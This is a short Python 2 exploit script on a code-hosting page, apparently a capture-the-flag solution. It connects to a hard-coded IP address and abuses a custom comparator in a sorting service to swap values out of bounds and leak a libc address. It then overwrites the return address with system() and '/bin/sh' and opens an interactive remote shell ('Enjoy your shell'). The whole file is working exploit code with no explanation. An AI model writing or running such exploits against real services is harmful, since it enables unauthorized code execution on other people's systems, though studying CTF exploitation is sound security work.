Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
63 lines (51 sloc) 1.34 KB
import sys, socket, time, os, re, telnetlib
def get_comparator(n, offset):
return """
answers = %s
i = 0
function f(a,b)
i = i + 1
return answers[i]
end
""" % os.popen("./compute_answers %d %d" % (n, offset)).read().strip()
def wait_for(s):
while True:
p = sock.recv(4096)
if s in p:
break
def socket_interact(s):
t = telnetlib.Telnet()
t.sock = s
t.interact()
def swap(offset, value):
n = 1024
values = [value] + list(xrange(1,n))
sock.send("7\n" +
get_comparator(n, n + offset) +
"1024\n" +
"\n".join(map(str,values)) + "\n")
res = None
while True:
p = sock.recv(4096)
m = re.search("Number 1 is now: (\d+)", p)
if m:
res = m.group(1)
if "custom\n:" in p:
break
return int(res)
sock = socket.create_connection(("188.40.18.75", 1234))
offset_libc_start_main_ret = 0x19a83
offset_system = 0x3e770
offset_binsh = 0x160264
wait_for("custom\n:")
libc = swap(8, 0x41414141) - offset_libc_start_main_ret
print "[*] leaked libc base =", hex(libc)
print "[*] overwriting return addr"
swap(8, libc + offset_system)
print "[*] set first argument to /bin/sh"
swap(10, libc + offset_binsh)
# trigger return
sock.send("0\n")
sock.recv(4096)
print "[*] Enjoy your shell ;)"
socket_interact(sock)